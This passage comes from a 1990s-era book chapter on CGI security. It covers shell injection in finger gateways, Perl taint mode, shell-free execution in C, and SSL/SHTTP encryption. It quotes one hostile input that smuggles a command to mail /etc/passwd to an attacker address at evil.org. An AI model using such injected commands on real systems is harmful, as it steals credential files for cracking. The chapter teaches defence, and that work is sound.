command was in the /bin directory, or else that rm was in the path. Both
are pretty reasonable guesses for the majority of UNIX machines, but they
are not global truths. In a chrooted environment that did not have the rm
binary located anywhere in the directory tree, the hacker's efforts would
have been useless. By
properly securing and configuring the Web server, you can theoretically
minimize the potential damage to almost zero, even with a badly written
script.
However, this is no cause to
lessen your caution when writing your CGI programs. In reality, most Web
environments are not chrooted, simply because chroot takes away the
flexibility many people need in a Web server. Even if one could not remove all the files
in a file system because the server was not running as root, someone could
just as easily try input such as the following, which would have e-mailed
the /etc/passwd file to me@evil.org for possible cracking:
nobody@nowhere.org
; /bin/mail me@evil.org < /etc/passwd
A hacker could do any number of
other things by manipulating this one hole, even in a well-configured
environment. If you let a hole slip past you in a simple CGI program, how
can you be sure you properly and securely configured your complicated UNIX
system and Web server?
The answer is, you can't. Your
best bet is to make sure your CGI programs are secure. Not sanitizing input
before running it in a shell is a simple thing to cure, and yet it is one of
the most common mistakes in CGI programming.
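Escaping is one cure. A stricter alternative, which this chapter does not cover and which is offered here only as a sketch, is to reject any input that contains characters outside a small allowed set. The function name is_safe_finger_target(), the allowed characters, and the 255-character limit are all assumptions chosen for the finger gateway example.

```c
#include <ctype.h>
#include <string.h>

/* Hypothetical validator: returns 1 if s contains only letters, digits,
   '.', '-', '_' and at most one '@', is 1 to 255 characters long, and
   does not start with '-'. Returns 0 otherwise. */
int is_safe_finger_target(const char *s)
{
    size_t i, len;
    int at_signs = 0;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len == 0 || len > 255)
        return 0;
    if (s[0] == '-')        /* would be read as a command-line option */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '@') {
            if (++at_signs > 1)
                return 0;
        } else if (!isalnum(c) && c != '.' && c != '-' && c != '_') {
            return 0;       /* spaces and all shell metacharacters fail */
        }
    }
    return 1;
}
```

The design choice is to list what is permitted rather than what is dangerous, so a metacharacter that was forgotten in an escape list is still refused.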
Fortunately, Perl has a good
mechanism for catching potentially tainted variables. If you use taintperl
instead of Perl (or perl -T if you are using Perl 5), the script will exit
at points where potentially tainted variables are passed to a shell command.
This will help you catch all instances of potentially tainted variables
before you actually begin to use your CGI program.
Notice that there are several more
functions in Perl that spawn the shell than there are in C. It is not
immediately obvious, even to the intermediate Perl programmer, that back
ticks spawn a shell before executing the program. This is the flip-side
danger of a higher-level language: you don't know what security holes a
function might cause because you don't necessarily know exactly what it
does.
You don't need to sanitize the
input if you avoid using functions that spawn shells. In Perl, you can do
this with either the system() or exec() function by passing the program and
each of its arguments as separate list elements rather than as one string.
For example, the following is safe without sanitizing $in{'username'}:
system("/usr/ucb/finger",$in{'username'});
However, in the case of your
finger gateway, this feature is useless because you need to process the
output of the finger command, and there is no way to trap it if you use the
system() function.
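In C, you can also execute
programs directly by using the exec class of functions: execv(), execl(),
execvp(), execlp(), and execle(). execl() is the closest C equivalent of the
Perl functions system() and exec() with multiple arguments. Unlike system(),
the exec functions replace the current process rather than return to it, so
a program that needs to continue afterward normally calls fork() first.
Which exec function you use and how you implement it depends on your need;
specifics go beyond the scope of this book.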
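For illustration only, here is one way a C program on a UNIX system might run a command without a shell and still capture its output, using pipe(), fork(), and execv(). The helper name run_capture() and its interface are assumptions made for this sketch; error handling is kept to a minimum.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run the program at path with the argument vector
   argv, bypassing the shell, and collect its standard output in out
   (always null-terminated, truncated to out_size - 1 bytes).
   Returns the child's exit status, or -1 on error. */
int run_capture(const char *path, char *const argv[],
                char *out, size_t out_size)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;
    char discard[256];

    if (out == NULL || out_size == 0 || pipe(fds) == -1)
        return -1;
    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                     /* child */
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);    /* stdout now feeds the pipe */
        close(fds[1]);
        execv(path, argv);              /* no shell: argv passed verbatim */
        _exit(127);                     /* reached only if execv() fails */
    }
    close(fds[1]);                      /* parent reads from the pipe */
    while (used < out_size - 1 &&
           (n = read(fds[0], out + used, out_size - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    while (read(fds[0], discard, sizeof discard) > 0)
        ;                               /* drain so the child can finish */
    close(fds[0]);
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

A finger gateway could call this with an argument vector such as { "finger", user, NULL } and the path /usr/bin/finger. Because no shell is involved, a semicolon in user is passed to finger as ordinary text. The input should still be checked, since the called program may interpret its own arguments (a leading hyphen, for example) in unexpected ways.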
Secure Transactions
One aspect of security only
briefly discussed earlier is privacy. A popular CGI application these days
tends to be one that collects credit card information. Data collection is a
simple task for a CGI application, but the collection of sensitive data
requires a secure means of getting the information from the browser to the
server and CGI program.
For example, suppose that I want
to sell books over the Internet. I might set up a Web server with a form
that allows customers to buy books by submitting personal information and a
credit card number. After I have that information, I want to store it on my
machine for company records.
If anyone were to break into my
company's machine, that person would have access to these confidential
records containing customer information and credit card numbers. In order to
prevent this, I would make sure the machine is configured securely and that
my CGI script that accepts form input is written correctly so that it cannot
be maliciously manipulated. In other words, as the administrator of the
machine and the CGI programmer, I have a lot of control over the first
problem: preventing information from being stolen directly from my machine.
However, how can I prevent someone
from intercepting the information as it goes from the client to the server?
Remember how information moves from the Web browser to the CGI program
(described in "Common Gateway Interface (CGI)")? Information flows over the
network from the browser to the server first, and then the server passes the
information to the CGI program. This information can be intercepted while it
is moved from the client machine to the server. Note that in order to protect the
information from being intercepted over the network, the information must be
encrypted between the client and the server.
You cannot implement a
CGI-specific encryption scheme unless the client understands it, as well.
Java, CGI, and Secure Transactions
Due to the nature of Web
transactions, the only way you could develop and use your own secure
transaction protocol using only CGI would be by first encrypting the form
information before it is submitted by the browser to the server.
Until recently, developing your
own secure transaction protocol was an impossible task. Thanks to recent
innovations in client-side processing such as Java, such development is now
possible.
The idea is to create a Java
interface that is a superset of normal HTML forms. When the Java Submit
button is selected, the Java applet first encrypts the appropriate values
before sending them to the Web server by using the normal HTTP POST request.
Using Java as a client to send and
receive encrypted data enables you to create your own customized encryption
schemes without requiring a potentially expensive commercial server. For
more information on how one might implement such a transaction.
Consequently, securing information
over the network requires modifying the way the browser and the server
communicate, something that cannot be controlled by using CGI. There are
currently two major proposals for encrypted client/server transactions:
Secure Sockets Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP),
proposed by Enterprise Integration Technologies (EIT). At this point, it is
not clear whether one scheme will become standard; several companies have
adopted both protocols in their servers. Consequently, it is useful to know
how to write CGI programs for both schemes.
SSL
SSL is a protocol-independent
encryption scheme that provides channel security between the application
layer and transport layer of the network stack. In plain English, this means
that encrypted transactions are handled "behind-the-scenes" by the server
and are essentially transparent to the HTML or CGI author.
Because the client and server's
network routines handle the encryption, almost all of your CGI scripts
should work without modification with secure transactions. There is one
notable exception. An nph (no-parse-header) CGI program bypasses the
server and communicates directly with the client. Consequently, nph CGI
scripts would break under secure transactions because the information never
gets encrypted. A notable CGI application that is affected by this problem
is Netscape server-push animations (discussed in detail in
Chapter 14, "Proprietary Extensions"). I doubt this is a major concern,
however, because it is highly likely that an animation is expendable on a
page for securely transmitting sensitive information.
SHTTP
SHTTP takes a different approach
from SSL. It works by extending the HTTP protocol (the application layer)
rather than a lower layer. Consequently, whereas SSL can be used for all
network services, SHTTP is a Web-specific protocol.
However, this has other benefits.
As a superset of HTTP, SHTTP is backward and forward compatible with HTTP
and SHTTP browsers and servers. In order to use SSL, you must have an SSL-enabled
browser and server. Additionally, SHTTP is a much more flexible protocol.
The server can designate preferred encryption schemes, for example.
SHTTP transactions depend on
additional HTTP headers. Consequently, if you want your CGI program to take
advantage of an SHTTP encrypted transaction, you need to include the
appropriate headers. For example, instead of simply returning the HTTP
header
Content-Type: text/html
you could return
Content-Type: text/html
Privacy-Enhancements: encrypt
When an SHTTP server receives this
information from the CGI application, it will know to encrypt the
information before sending it to the browser. A non-SHTTP browser will just
ignore the extra header.
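In a C CGI program, emitting these headers might look like the following sketch. The function name print_headers() and its encrypt flag are hypothetical; the header lines themselves are the ones shown above, followed by the blank line that ends a CGI header block.

```c
#include <stdio.h>

/* Hypothetical helper: write the CGI response headers to out. When
   encrypt is nonzero, add the Privacy-Enhancements header. The final
   blank line marks the end of the headers. */
void print_headers(FILE *out, int encrypt)
{
    fputs("Content-Type: text/html\n", out);
    if (encrypt)
        fputs("Privacy-Enhancements: encrypt\n", out);
    fputs("\n", out);
}
```

A program would call print_headers(stdout, 1) before printing the HTML body when it wants an SHTTP server to encrypt the response.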
For more information on using
SHTTP, refer to the SHTTP specifications located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>
Summary
Security is an all-encompassing
thing when you are dealing with networked applications such as the World
Wide Web. Writing secure CGI applications is not tremendously useful if your
Web server is not securely configured. A properly configured Web server, on
the other hand, can minimize the damage of a badly written CGI script.
In general, remember the following
principles:
·
Your programs should do only what you want them to
do, no more.
·
Don't reveal any more information about your
server than necessary.
·
Minimize the potential damage if someone
successfully breaks into your machine.
·
Make sure your applications are robust.
When you are writing CGI programs,
be especially wary of the limitations (or lack thereof) of your programming
language and of passing unsanitized variables to the shell.